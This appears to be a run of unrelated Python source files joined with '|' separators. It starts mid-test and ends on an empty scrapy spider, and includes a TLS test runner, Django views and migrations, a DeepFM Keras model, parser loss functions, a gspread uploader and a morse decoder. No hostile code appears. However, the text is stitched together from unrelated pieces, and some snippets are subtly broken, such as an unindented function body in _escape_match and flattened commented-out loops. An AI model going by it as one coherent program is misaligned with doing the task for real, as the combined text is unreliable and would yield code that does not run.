                    .all())  # @UndefinedVariable
        self.assertEqual(len(results_for_season(1)), 8)
        self.assertEqual(len(results_for_season(2)), 2)

    def test_score(self):
        def result_for_user(user_id):
            # Single result for tournament 1 and the given user.
            return (config.orm.query(Result)
                    .filter(Result.tournament_id == 1)
                    .filter(Result.user_id == user_id)
                    .one())  # @UndefinedVariable
        self.assertIsNone(result_for_user(1).score)  # franck_l
        self.assertIsNone(result_for_user(3).score)  # fx
        self.assertEqual(result_for_user(2).score, 67)  # franck_p
        self.assertEqual(result_for_user(4).score, 34)  # jo
        self.assertEqual(result_for_user(5).score, 5)  # nico
|
from __future__ import print_function, unicode_literals
import re
import os
import sys
import string
import argparse
import subprocess
from . import __version__, utils, results, bundles, testenv, formatters
class Unsupported(Exception):
    """The stub reported UNSUPPORTED for the requested behaviour."""
    pass
class ProcessFailed(Exception):
    """The stub process failed to launch or exited with a non-zero code."""
    pass
class UnexpectedOutput(Exception):
    """The stub's output did not end with a recognized verdict line."""
    pass
def output_info(formatter, args, runner_name="trytls"):
    """Write platform, runner-version and stub information to the formatter."""
    formatter.write_platform(utils.platform_info())
    runner_line = "{runner} {version} ({python})".format(
        runner=runner_name,
        version=__version__,
        python=utils.python_info(),
    )
    formatter.write_runner(runner_line)
    formatter.write_stub(args)
# A regex that matches to any byte that is not a 7-bit ASCII printable.
_NON_PRINTABLE_REX = re.compile(
b"[^" + b"".join(re.escape(x).encode("ascii") for x in string.printable) + b"]"
)
def _escape_match(match):
return "\\x{:02x}".format(ord(match.group(0))).encode("ascii")
def _escape_non_printable(byte_string):
    r"""
    Return the byte string, escaping all bytes outside printable
    7-bit ASCII.
    >>> _escape_non_printable(b"Hello, World!") == b"Hello, World!"
    True
    Non-printables are \xNN-escaped.
    >>> _escape_non_printable(b"\x00\xff") == b"\\x00\\xff"
    True
    """
    # Delegate replacement to the precompiled module-level regex.
    return _NON_PRINTABLE_REX.sub(_escape_match, byte_string)
def run_stub(args, host, port, cafile=None):
    """Launch the stub against host:port and parse its verdict.

    Returns (accepted, details). Raises ProcessFailed when the stub can't
    be launched or exits non-zero, Unsupported on an UNSUPPORTED verdict,
    and UnexpectedOutput when no verdict line is recognized.
    """
    command = args + [host, str(port)]
    if cafile is not None:
        command.append(cafile)
    try:
        process = subprocess.Popen(
            command,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT
        )
    except OSError as ose:
        raise ProcessFailed("failed to launch the stub", os.strerror(ose.errno))
    out, _ = process.communicate()
    # Escape non-printable bytes so the output is safe to decode and show.
    out = _escape_non_printable(out).decode("ascii")
    if process.returncode != 0:
        raise ProcessFailed(
            "stub exited with return code {}".format(process.returncode),
            out
        )
    out = out.rstrip()
    lines = out.splitlines()
    if lines:
        # The last line carries the verdict; the rest are details.
        verdict = lines.pop()
        details = "".join(lines)
        if verdict == "ACCEPT":
            return True, details
        if verdict == "REJECT":
            return False, details
        if verdict == "UNSUPPORTED":
            raise Unsupported(details)
    raise UnexpectedOutput(out)
def collect(test, args):
    """Run the stub for one test and map the outcome onto a result object."""
    try:
        accept, details = run_stub(list(args), test.host, test.port, test.cafile)
    except Unsupported as us:
        return results.Skip(
            reason="the stub couldn't implement the requested behaviour (e.g. setting CA certificate bundle)",
            details=us.args[0])
    except UnexpectedOutput as uo:
        output = uo.args[0].strip()
        if output:
            return results.Error("unexpected output", output)
        return results.Error("no output")
    except ProcessFailed as pf:
        return results.Error(pf.args[0], pf.args[1])
    # Pass exactly when the stub's verdict matches the expected one.
    if accept == bool(test.accept):
        return results.Pass(details=details)
    return results.Fail(details=details)
def run(formatter, args, tests):
    """Run every test, write its result, and return True when nothing failed or errored."""
    fail_count = 0
    error_count = 0
    with formatter.tests() as writer:
        for test, result in testenv.run(tests, collect, args):
            writer.write_test(test, result)
            fail_count += 1 if result.type == results.Fail else 0
            error_count += 1 if result.type == results.Error else 0
    return fail_count == 0 and error_count == 0
def main():
    """CLI entry point: parse args, resolve formatter and bundle, run the tests.

    Returns 0 on success, 3 when any test failed or errored; argparse
    exits with 2 itself on bad parameters.
    """
    parser = argparse.ArgumentParser(
        usage="%(prog)s bundle command [arg ...]"
    )
    # Phase 1: capture everything after the program name; the bundle name
    # and stub command are extracted manually from this remainder.
    parser.add_argument(
        "remainder",
        help=argparse.SUPPRESS,
        nargs=argparse.REMAINDER
    )
    args = parser.parse_args()
    if args.remainder and args.remainder[0] == "--":
        args.remainder.pop(0)
    bundle_name = args.remainder[0] if args.remainder else None
    # Phase 2: re-parse the rest of the remainder for options such as
    # --formatter, accumulating into the same namespace.
    parser.add_argument(
        "--formatter",
        help="formatter",
        default="default"
    )
    args = parser.parse_args(args.remainder[1:], args)
    if args.remainder and args.remainder[0] == "--":
        args.remainder.pop(0)
    command = args.remainder
    create_formatter = formatters.load_formatter(args.formatter)
    if create_formatter is None:
        formatter_list = [" " + x for x in sorted(formatters.iter_formatters())]
        parser.error(
            "unknown formatter '{}'\n\n".format(args.formatter) +
            "Valid formatter options:\n" + "\n".join(formatter_list)
        )
    if bundle_name is None:
        bundle_list = [" " + x for x in sorted(bundles.iter_bundles())]
        parser.error(
            "missing the bundle argument\n\n" +
            "Valid bundle options:\n" + "\n".join(bundle_list)
        )
    bundle = bundles.load_bundle(bundle_name)
    if bundle is None:
        parser.error("unknown bundle '{}'".format(bundle_name))
    if not command:
        parser.error("too few arguments, missing command")
    with create_formatter(sys.stdout) as formatter:
        output_info(formatter, command)
        if not run(formatter, command, bundle):
            # Return with a non-zero exit code if all tests were not successful. The
            # CPython interpreter exits with 1 when an unhandled exception occurs,
            # and with 2 when there is a problem with a command line parameter. The
            # argparse module also uses the code 2 for the same purpose. Therefore
            # the chosen return value here is 3.
            return 3
    return 0
# Script entry point: propagate main()'s return value as the exit code.
if __name__ == "__main__":
    sys.exit(main())
|
# My Original Code
# def replace_exclamation(s):
# vowels = ('a','e','i','o','u')
# for i in s:
# if i.lower() in vowels:
# s = s.replace(i, '!')
# return s
#Best Practice
def replace_exclamation(s):
    """Return *s* with every vowel (either case) replaced by '!'."""
    table = str.maketrans({vowel: "!" for vowel in "aeiouAEIOU"})
    return s.translate(table)
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
# Use service-account creds to build a gspread client for the Sheets/Drive API.
# NOTE(review): `scope` is a single space-joined string inside a one-element
# list, not two separate scope strings — this appears to work, but a
# two-element list is the conventional form; confirm before changing.
scope = ['https://spreadsheets.google.com/feeds' + ' ' +'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
sheet = client.open("testing").sheet1  # first worksheet of the "testing" spreadsheet
##sheet.update_cell(1,1, "Hey there")
import datetime
import schedule
import time
import codecs
import string
import glob
import os
row = 2     # next spreadsheet row to write — starts at 2, presumably below a header; TODO confirm
minute = 2  # cycles 2..12, selecting which block of fields to read from the dump
def job():
    """Read the newest dump file and push one row of values to the sheet.

    The dump is a single comma-separated record; every value of interest is
    read as li[index][1::2] (dropping interleaved characters). Each call
    handles one "minute" (2..12): its 30 data fields start at a fixed offset
    in the record and are written to the next spreadsheet row.
    """
    global row, minute
    # Find the most recently created file in the watch folder.
    list_of_files = glob.glob('C:/Users/Shane/Desktop/sort/*')  # * means all; use *.csv for a specific format
    latest_file = max(list_of_files, key=os.path.getctime)
    # BUG FIX: the original opened without a context manager; `with`
    # guarantees the handle is closed even if read() fails.
    with open(latest_file, "r") as latest_file_open:
        contents = latest_file_open.read()
    # split file into a list of string fields
    li = [str(part) for part in contents.split(",")]
    # Per-minute table: minute -> (offset of its 30-field block, printed label).
    # Replaces eleven duplicated ~35-line branches from the original.
    # NOTE(review): minute 6 reused minute 5's offsets and printed 'row 5' in
    # the original — preserved verbatim here, but it looks like a copy-paste
    # slip; confirm the intended offsets.
    bases = {
        2: (61, 'row 2'), 3: (331, 'row 3'), 4: (661, 'row 4'),
        5: (931, 'row 5'), 6: (931, 'row 5'), 7: (1201, 'row 7'),
        8: (1861, 'row 8'), 9: (2071, 'row 9'), 10: (2431, 'row 10'),
        11: (2761, 'row 11'), 12: (3031, 'row 12'),
    }
    if minute in bases:
        base, label = bases[minute]
        date = li[30][1::2]
        date_modified = date[11:30]
        # The 30 consecutive fields, in order: time, catalyst, methanol_1,
        # methanol_2, reclaimed_methanol, dump_tank, dump_tank_flow_meter,
        # tank_1..3, disc_1_feed, disc_1_out, yg_offload_1/2, yg_15k_1/2,
        # disc_2_feed, disc_2_out, wet_oil, waste, yg, bio_1..3, glycerin,
        # day_tank, backup_day_tank_5k, reclaimed_methanol_totalizer,
        # feed_stock_totalizer, b100_temp.
        values = [li[base + k][1::2] for k in range(30)]
        b100_temp_modified = values[29][0:8]
        print(label)
        print(values[0])  # the block's timestamp field
        minute += 1
    else:
        print('something didnt work')
    if minute > 12:
        minute = 2
    # update sheets: column 1 is the date, columns 2-30 the first 29 fields,
    # column 31 the truncated b100 temperature.
    cells = [date_modified] + values[:29] + [b100_temp_modified]
    for col, value in enumerate(cells, start=1):
        sheet.update_cell(row, col, value)
    print('job ran')
    row += 1
    return
def running():
    """Print a heartbeat message plus the current time once a minute, forever."""
    while True:
        now = datetime.datetime.now().time()
        print("Program is Running..." )
        print(now)
        time.sleep(60)
    return  # unreachable; kept for parity with the original
'''
schedule.every().day.at("15:29").do(job)
#schedule.every().day.at("13:02").do(job)
while True:
schedule.run_pending()
time.sleep(60)
'''
if __name__ == '__main__':
    # Run job() roughly every 30 s, aligned to start_time so that job()'s
    # own runtime does not accumulate as drift.
    start_time = time.time()
    while True:
        job()
        time.sleep(30.0 - ((time.time()-start_time) % 30.0 ))
|
# coding:utf-8
def script(s, player=None):
    """Post-script for objective "q1".

    Awards a quest point when the answer is "1"/"un", speaks the verdict,
    then speaks an explanation about mulching ("paillage"). The spoken
    strings are French runtime text and must stay unchanged.
    """
    from NaoQuest.objective import Objective
    from NaoCreator.setting import Setting
    from NaoCreator.Tool.speech_move import speech_and_move
    if not player:
        # Without a player there is nothing to score; log and bail out.
        Setting.error("Error in execution of post_script of objective \"q1\": player is None")
        return
    if hasattr(s, "kw_answer"):
        if s.kw_answer == "1" or s.kw_answer == "un":
            # Correct answer: credit the point and congratulate.
            player.current_quest.point += 1
            speech_and_move(u"Félicitation tu a la bonne réponse.")
        else:
            speech_and_move(u"mauvaise réponse ! La bonne réponse était. 1.")
        # The explanation is spoken whichever branch was taken.
        speech_and_move(u"Voici l'explication : Le paillage est une méthode pour protéger des excès de chaleur, "
                        u"de froid, limiter l'évaporation et empécher les mauvaises herbes. "
                        u"Il s'agit de recouvrir le sol avec une couche de paillis au début de la saison"
                        u"de culture et de renouveler l'opération si nécessaire.")
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import backend
from tensorflow.keras import layers
import pandas as pd
def model(embedding_size, field_vocab_size=None, hidden_units=None, dropout=0.5):
    """Build a DeepFM-style binary classifier.

    Args:
        embedding_size: latent dimension K of each field embedding.
        field_vocab_size: vocabulary size per categorical field (default []).
        hidden_units: widths of the deep component's hidden layers (default [4, 4, 4]).
        dropout: dropout rate after each hidden layer; 0 disables dropout.

    Returns:
        An uncompiled keras.Model taking one integer input per field and
        producing a sigmoid probability.
    """
    # Avoid mutable default arguments while keeping the original defaults.
    field_vocab_size = [] if field_vocab_size is None else field_vocab_size
    hidden_units = [4, 4, 4] if hidden_units is None else hidden_units
    F = len(field_vocab_size)
    # prepare embeddings: per field, a K-dim embedding (second order) and a
    # scalar embedding (first-order weight)
    inputs = []
    embed_list = []
    embed_one_list = []
    for vocab_size in field_vocab_size:
        in_ = keras.Input(shape=(1,))
        inputs.append(in_)
        embed_list.append(layers.Embedding(vocab_size, embedding_size, input_length=1)(in_))
        embed_one_list.append(layers.Embedding(vocab_size, 1, input_length=1)(in_))
    embed_list = layers.concatenate(embed_list, axis=1)  # None, F, K
    fm_first_in = layers.concatenate(embed_one_list, axis=1)  # None, F, 1
    fm_first_in = layers.Lambda(lambda x: backend.squeeze(x, axis=2))(fm_first_in)  # None, F
    # deep component
    dropouts = [dropout] * len(hidden_units)
    weight_init = keras.initializers.glorot_uniform()
    z = layers.Reshape((F * embedding_size,))(embed_list)
    for i, (h, d) in enumerate(zip(hidden_units, dropouts)):
        # BUG FIX: the original fed every hidden Dense layer from the
        # flattened embeddings (deep_in), so the layers were never stacked
        # and only the last one reached the output. Chain each layer onto
        # the previous one instead.
        z = layers.Dense(units=h, kernel_initializer=weight_init)(z)
        z = layers.BatchNormalization(axis=-1)(z)
        z = layers.Activation("relu")(z)
        # NOTE(review): seed=d*i is a float seed as in the original — confirm intended.
        z = layers.Dropout(d, seed=d * i)(z) if d > 0 else z
    # BUG FIX: the original used softmax on a single unit, which always
    # outputs the constant 1.0; a linear unit gives the final sigmoid a
    # real logit to work with.
    deep_out = layers.Dense(units=1, kernel_initializer=weight_init)(z)
    # deep_out: None, 1
    # fm layer
    fm_first_order = layers.Lambda(lambda x: backend.sum(x, axis=1))(fm_first_in)  # None,
    emb_sum_squared = layers.Lambda(lambda x: backend.square(backend.sum(x, axis=1)))(embed_list)  # none, K
    emb_squared_sum = layers.Lambda(lambda x: backend.sum(backend.square(x), axis=1))(embed_list)  # none, K
    # NOTE(review): the textbook FM second-order term carries a 0.5 factor
    # (0.5 * (sum^2 - sum-of-squares)); it is omitted here as in the
    # original — confirm whether that is intentional.
    fm_second_order = layers.Subtract()([emb_sum_squared, emb_squared_sum])
    fm_second_order = layers.Lambda(lambda x: backend.sum(x, axis=1))(fm_second_order)  # none,
    fm_out = layers.Add()([fm_first_order, fm_second_order])
    out = layers.Add()([deep_out, fm_out])
    out = layers.Activation(activation='sigmoid')(out)
    model = keras.Model(inputs=inputs, outputs=out)
    return model
|
from django.shortcuts import render
def code(request):
    """Render the completion-code page, exposing the session's user_id as "code"."""
    return render(request, "turk/code.html", {"code": request.session['user_id']})
|
from src.mongo import Mongo
from src.etl.aggregate_card_deck_occurrences.card_deck_occurrence_aggregator import CardDeckOccurrenceAggregator
def handler(event=None, context=None):
    """Lambda-style entry point: run the card/deck occurrence aggregation job.

    The event/context arguments are accepted for the serverless calling
    convention but are not used.
    """
    CardDeckOccurrenceAggregator(Mongo()).run()


if __name__ == '__main__':
    handler()
|
from .gcn import GCN
from .sgc import SGC
from .gat import GAT |
# Generated by Django 2.1.3 on 2019-01-19 19:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``student`` app.

    Adds the DatesAvailable/Profile/Tutor models, strips the name/major/year
    columns off Student (they move to Profile), and wires up the new
    relations.  Operation order matters — do not reorder or edit by hand once
    this migration has been applied anywhere.
    """
    dependencies = [
        ('student', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='DatesAvailable',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): auto_now=True re-stamps these on every save();
                # for an availability window an editable DateField was probably
                # intended — confirm before relying on these values.
                ('startTime', models.DateField(auto_now=True)),
                ('endTime', models.DateField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('firstName', models.CharField(max_length=30)),
                ('lastName', models.CharField(max_length=30)),
                ('year', models.IntegerField()),
                ('major', models.CharField(max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='Tutor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        # Student is repurposed: its identity fields move to Profile and
        # firstName is recycled as the subject the student wants tutoring in.
        migrations.RenameField(
            model_name='student',
            old_name='firstName',
            new_name='subjectLookingFor',
        ),
        migrations.RemoveField(
            model_name='student',
            name='lastName',
        ),
        migrations.RemoveField(
            model_name='student',
            name='major',
        ),
        migrations.RemoveField(
            model_name='student',
            name='year',
        ),
        migrations.AddField(
            model_name='student',
            name='payOffered',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='tutor',
            name='pastStudents',
            field=models.ManyToManyField(to='student.Student'),
        ),
        migrations.AddField(
            model_name='tutor',
            name='profile',
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Profile'),
        ),
        migrations.AddField(
            model_name='tutor',
            name='timesAvailable',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student.DatesAvailable'),
        ),
        migrations.AddField(
            model_name='student',
            name='profile',
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Profile'),
        ),
    ]
|
from django.conf.urls import patterns, include, url
from apps.main.views import IndexView, NewsView, ArticleView, NewsinView, ArticleinView, ContactsView, SearchView
""" autocomplete_light.autodiscover()
BEFORE
admin.autodiscover()"""
import autocomplete_light
autocomplete_light.autodiscover()
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'realist.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^autocomplete/', include('autocomplete_light.urls')),
url(r'^$', IndexView.as_view(), name='index'),
url(r'^news/', NewsView.as_view(), name='news'),
url(r'^articles/', ArticleView.as_view(), name='articles'),
url(r'^article_page/', ArticleinView.as_view(), name='articlepage'),
url(r'^contacts/', ContactsView.as_view(), name='contacts'),
url(r'^search/', SearchView.as_view(), name='search'),
url(r'^news_page/', NewsinView.as_view(), name='newspage'),
)
|
# Module-level constants.
# BUG FIX: the original line read "PATH = 5 |" — the trailing '|' (a join
# artifact) is a SyntaxError and has been removed.
TEST = 'woo'  # NOTE(review): meaning not evident from this file — confirm usage.
PATH = 5
from django.shortcuts import render
from .models import ServicesData,FeedbackData,EnquiryData
from .forms import FeedbackForm,EnquiryForm
from django.http.response import HttpResponse
import datetime as dt
# NOTE(review): evaluated once at import time, so every consumer sees the
# server-start timestamp rather than the current time — call
# dt.datetime.now() at the point of use instead.
date1 = dt.datetime.now()
def home_view(request):
    """Render the static landing page."""
    return render(request, 'durgasoft_home.html')
def services_view(request):
    """List every ServicesData row on the services page."""
    all_services = ServicesData.objects.all()
    return render(request, 'durgasoft_services.html', {'services': all_services})
def enquiry_view(request):
    """Render the enquiry/contact page; on a valid POST persist an EnquiryData row."""
    if request.method != "POST":
        # Plain GET: show an empty form.
        return render(request,'durgasoft_contact.html',{'eform': EnquiryForm()})
    eform = EnquiryForm(request.POST)
    if not eform.is_valid():
        return HttpResponse("user invalid data")
    # NOTE(review): name/mobile/email/gender are read from the raw POST data
    # while the remaining fields come from cleaned_data — presumably
    # EnquiryForm only declares the latter; confirm against the form class.
    cleaned = eform.cleaned_data
    record = EnquiryData(
        name=request.POST.get('name'),
        mobile=request.POST.get('mobile'),
        email=request.POST.get('email'),
        gender=request.POST.get('gender'),
        courses=cleaned.get('courses'),
        shifts=cleaned.get('shifts'),
        start_date=cleaned.get('start_date')
    )
    record.save()
    # Re-render with a fresh, unbound form after a successful save.
    return render(request, 'durgasoft_contact.html', {'eform': EnquiryForm()})
def gallery_view(request):
    """Render the static gallery page."""
    return render(request, 'durgasoft_gallery.html')
def feedback_view(request):
    """Show the feedback form plus all stored feedback.

    On POST, validates FeedbackForm, stores a FeedbackData row stamped with
    the current time, and re-renders the page with a fresh form.
    """
    if request.method == "POST":
        fform = FeedbackForm(request.POST)
        if fform.is_valid():
            name = request.POST.get('name')
            rating = request.POST.get('rating')
            feedback = request.POST.get('feedback')
            data = FeedbackData(
                name=name,
                rating=rating,
                feedback=feedback,
                # BUG FIX: the module-level date1 is evaluated once at import
                # time, so every row was stamped with the server start time
                # instead of the submission time.
                date=dt.datetime.now()
            )
            data.save()
            fform = FeedbackForm()
        else:
            return HttpResponse('user invalid data')
    else:
        fform = FeedbackForm()
    feedbacks = FeedbackData.objects.all()
    return render(request,'durgasoft_feedback.html',{'feedbacks':feedbacks,'fform':fform})
|
from abc import ABC, abstractmethod
import torch
from torch import nn, Tensor
from torch.nn.modules.loss import _Loss
from parseridge.utils.logger import LoggerMixin
class Loss(ABC, LoggerMixin):
    """Interface for parser loss functions.

    Implementations receive the predicted transition/relation score matrices
    together with the gold indices and the wrong (padded) candidate indices,
    and must return a scalar loss tensor.
    """
    @abstractmethod
    def __call__(
        self,
        pred_transitions: Tensor,
        pred_relations: Tensor,
        gold_transitions: Tensor,
        gold_relations: Tensor,
        wrong_transitions: Tensor,
        wrong_transitions_lengths: Tensor,
        wrong_relations: Tensor,
        wrong_relations_lengths: Tensor,
    ) -> Tensor:
        raise NotImplementedError()
class PyTorchLoss(Loss):
    """
    Wrapper that calls the given PyTorch loss function and strips all other arguments.
    """

    def __init__(self, criterion):
        # Must be a torch loss module (subclass of _Loss).
        self.criterion = criterion
        assert isinstance(self.criterion, _Loss)

    def __call__(
        self,
        pred_transitions: Tensor,
        pred_relations: Tensor,
        gold_transitions: Tensor,
        gold_relations: Tensor,
        **kwargs,
    ) -> Tensor:
        # Apply the wrapped criterion to both prediction heads and sum.
        transition_loss = self.criterion(pred_transitions, gold_transitions)
        relation_loss = self.criterion(pred_relations, gold_relations)
        return transition_loss + relation_loss
class MaxMarginLoss(Loss):
    """Structured max-margin (hinge-style) loss.

    Pushes the score of the gold (transition, relation) pair above the
    best-scoring wrong pair by at least ``margin_threshold``.
    """

    def __init__(self, margin_threshold: float = 1.0):
        # Minimum required gap between the gold score and the best wrong score.
        self.margin_threshold = margin_threshold

    def __call__(
        self,
        pred_transitions: Tensor,
        pred_relations: Tensor,
        gold_transitions: Tensor,
        gold_relations: Tensor,
        wrong_transitions: Tensor,
        wrong_transitions_lengths: Tensor,
        wrong_relations: Tensor,
        wrong_relations_lengths: Tensor,
    ) -> Tensor:
        gold_scores = self._get_gold_scores(
            pred_transitions, pred_relations, gold_transitions, gold_relations
        )
        wrong_scores = self._get_wrong_scores(
            pred_transitions,
            pred_relations,
            wrong_transitions,
            wrong_relations,
            wrong_transitions_lengths,
        )
        # Compute the margin between the best wrong scores and the gold scores
        scores = wrong_scores - gold_scores
        # Average the loss only over items where the gold score does not beat
        # the best wrong score by at least the margin threshold.
        masked_scores = scores[gold_scores < wrong_scores + self.margin_threshold]
        if masked_scores.numel() == 0:
            # BUG FIX: torch.mean over an empty tensor is NaN, which would
            # poison the whole training step once every item already satisfies
            # the margin.  Return a graph-connected zero instead.
            return scores.sum() * 0.0
        return torch.mean(masked_scores)

    @staticmethod
    def _get_gold_scores(
        pred_transitions: Tensor,
        pred_relations: Tensor,
        gold_transitions: Tensor,
        gold_relations: Tensor,
    ) -> Tensor:
        # Compute the scores of the gold items by adding the score for the relation to
        # the score of the transition.
        gold_transitions_scores = pred_transitions.gather(
            dim=1, index=gold_transitions.unsqueeze(1)
        )
        gold_relations_scores = pred_relations.gather(
            dim=1, index=gold_relations.unsqueeze(1)
        )
        return (gold_transitions_scores + gold_relations_scores).squeeze()

    @staticmethod
    def _get_wrong_scores(
        pred_transitions: Tensor,
        pred_relations: Tensor,
        wrong_transitions: Tensor,
        wrong_relations: Tensor,
        wrong_transitions_lengths: Tensor,
    ) -> Tensor:
        # In every batch, compute a score for all the wrong items
        wrong_transitions_scores = torch.gather(pred_transitions, 1, wrong_transitions)
        wrong_relations_scores = torch.gather(pred_relations, 1, wrong_relations)
        wrong_scores = wrong_transitions_scores + wrong_relations_scores
        # For clarity, we rename the variable,
        # since wrong_transitions_lengths == wrong_relations_lengths
        wrong_actions_lengths = wrong_transitions_lengths
        # Create a mask based on sequence lengths.
        # See: http://juditacs.github.io/2018/12/27/masked-attention.html
        max_len = wrong_scores.size(1)
        device = wrong_actions_lengths.device
        mask = (
            torch.arange(max_len, device=device)[None, :] < wrong_actions_lengths[:, None]
        )
        # Invert mask and blank out all padding so padded slots never win the max.
        wrong_scores[~mask] = float("-inf")
        # Get the best wrong action for each item in the batch
        wrong_scores, _ = torch.max(wrong_scores, dim=1)
        return wrong_scores
class Criterion(Loss):
    """Factory/dispatcher that builds a named loss function and delegates to it."""

    # Map of loss names to zero-config factories taking a kwargs dict.
    LOSS_FUNCTIONS = {
        "CrossEntropy": lambda kwargs: PyTorchLoss(nn.CrossEntropyLoss(**kwargs)),
        "MSELoss": lambda kwargs: PyTorchLoss(nn.MSELoss(**kwargs)),
        "NLLLoss": lambda kwargs: PyTorchLoss(nn.NLLLoss(**kwargs)),
        "MaxMargin": lambda kwargs: MaxMarginLoss(**kwargs),
    }

    def __init__(self, loss_function: str = "CrossEntropy", **kwargs):
        if loss_function not in self.LOSS_FUNCTIONS:
            raise ValueError(
                f"Unknown loss function: {loss_function}. "
                f"Must be one of {list(self.LOSS_FUNCTIONS.keys())}"
            )
        factory = self.LOSS_FUNCTIONS[loss_function]
        self.criterion = factory(kwargs)

    def __call__(self, *args, **kwargs) -> Tensor:
        # Delegate straight to the selected loss implementation.
        return self.criterion(*args, **kwargs)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 9 10:14:20 2020
@author: ritambasu

Solve the 3x3 linear system A.x = b and verify the solution.
"""
import numpy as np

# Coefficient matrix and right-hand side of A.x = b.
a = np.array([[1,0.67,0.33],[0.45,1,0.55],[0.67,0.33,1]])
b = np.array([2,2,2])
x = np.linalg.solve(a,b)
true_solved_solution = np.array([1.0,1.0,1.0])
print (x)
# Checking Ax=b is true or false:
# BUG FIX: the original called np.allclose(np.dot(a, x), b, true_solved_solution),
# passing the expected-solution array as the *rtol* tolerance argument, which
# made the check meaningless.  Compare A.x against b, and x against the known
# solution, explicitly.
y = np.allclose(np.dot(a, x), b) and np.allclose(x, true_solved_solution)
print ("Is the solution matched with the true one?",y)
from decoder_29628792 import Decoder
from character_29628792 import CharacterAnalyser
from word_29628792 import WordAnalyser
from sentence_29628792 import SentenceAnalyser
def get_input():
    """Prompt for a morse sequence and validate it.

    Returns the raw string when valid, or False (after printing an error
    message) when any of the three checks below fails.
    """
    encoded = input("Enter a sequence of morse code: ")
    # Rule 1: at least one word separator ("***") must be present.
    if "***" not in encoded:
        print( "Invalid input, there should be at least one set of three consecutive '*'")
        return False
    # Rule 2: the sequence must end with one of the punctuation codes.
    if encoded[-6:] not in ("001100", "010101", "110011"):
        print( "Invalid input, every input must end with a punctuation.")
        return False
    # Rule 3: every letter code must exist in the decoder dictionary.
    for word in encoded.split("***"):
        for letter in word.split('*'):
            if letter not in Decoder().dictionary:
                print("Invalid input, it is not defined in the dictionary")
                return False
    return encoded
def choice():
    """Show the analysis menu and return the user's raw selection."""
    menu = ("If you want to analyse characters: press c then enter \n"
            "if you want to analyse words: press w then enter \n"
            "if you want to analyse sentences: press s then enter \n"
            "if you want to analyse all: press a then enter \n")
    return input(menu)
def main ():
    """Interactive driver: read, decode and analyse morse sequences until quit.

    Keeps a concatenation of every successfully decoded sequence so that the
    total occurrence counts can be reported once the user terminates.
    """
    decoder = Decoder() # Instances for all classes
    character_analyser = CharacterAnalyser()
    word_analyser = WordAnalyser()
    sentence_analyser = SentenceAnalyser()
    one_more_entry=True # created to get input from user until he/she terminates
    all_decoded_strings = "" # stores all valid, decoded sequences to show total occurrences when the program is terminated
    while one_more_entry == True:
        in_put = get_input()
        if in_put != False: # Ignores input before decode it. If get_input() returns False, There is an error and program tries to get one more input
            decoded=decoder.decode(in_put)
            all_decoded_strings += decoded # Adds all valid, decoded sequences to show total occurrences when the program is terminated
            print(decoded) # To show every decoded sequence for every input.
            ch=choice() #User menu to choose analyses
            if ch=="c":
                character_analyser.analyse_characters(decoded)
                print("Number of characters decoded \n",character_analyser)
            elif ch=='w':
                word_analyser.analyse_words(decoded)
                print("Number of words decoded \n",word_analyser)
            elif ch=="s":
                sentence_analyser.analyse_sentences(decoded)
                print("Number of senteces decoded \n",sentence_analyser)
            elif ch=="a":
                sentence_analyser.analyse_sentences(decoded)
                word_analyser.analyse_words(decoded)
                character_analyser.analyse_characters(decoded)
                print(character_analyser)
                print(word_analyser)
                print(sentence_analyser)
        # Asked after every attempt, valid or not.
        terminate = input("if you want to terminate, please press t then enter, if not just enter ")
        if terminate =="t":
            break
    totalc=CharacterAnalyser() # New instances of classes to store and show total occurrences.
    totalw=WordAnalyser() # We need to create new instances because pre defined ones stores occurences for every entry
    totals=SentenceAnalyser() # And restarts for every input
    totalc.analyse_characters(all_decoded_strings)
    totalw.analyse_words(all_decoded_strings)
    totals.analyse_sentences(all_decoded_strings)
    print("Total number of character occurrences \n", totalc)
    print("Total number of word occurrences \n", totalw)
    print("Total number of sentences occurrences \n", totals)
if __name__ == '__main__':
    # BUG FIX: removed the trailing '|' join artifact that made this line a
    # SyntaxError.
    main()
import json

# Extract one embassy's title/email from mood.json and append it to a
# plain-text dictionary file.
embassy = {}
i = 0  # change vary on len of dict
with open('mood.json') as data_file:
    data = json.load(data_file)
#for i in data['embassies']: loop thru every country
email = data['embassies'][i]['email']
whom = data['embassies'][i]['title']
print(whom)
print(email)
# Only record entries that have both a title and an email.
if email and whom:
    embassy.update({whom:email})
tf = '/Users/ejr/Desktop/everycount/dict.txt'
# BUG FIX: the original opened tf twice (leaking the first handle) and then
# called truncate()/close() on the with-managed file — truncate() at the end
# of an append is a no-op and close() is handled by the context manager.
with open(tf, "a") as f:
    f.write(str(embassy))
    f.write("\n")
import unittest
from katas.kyu_8.jennys_secret_msg import greet
class GreetTestCase(unittest.TestCase):
    """Tests for the kata's greet() function."""

    def test_equals(self):
        # Ordinary name: standard greeting.
        result = greet('James')
        self.assertEqual(result, 'Hello, James!')

    def test_equals_2(self):
        # The special name triggers the secret message.
        result = greet('Johnny')
        self.assertEqual(result, 'Hello, my love!')
|
import scrapy
class QuotesSpider(scrapy.Spider):
    """Spider that collects listing links from a Lianjia second-hand page."""

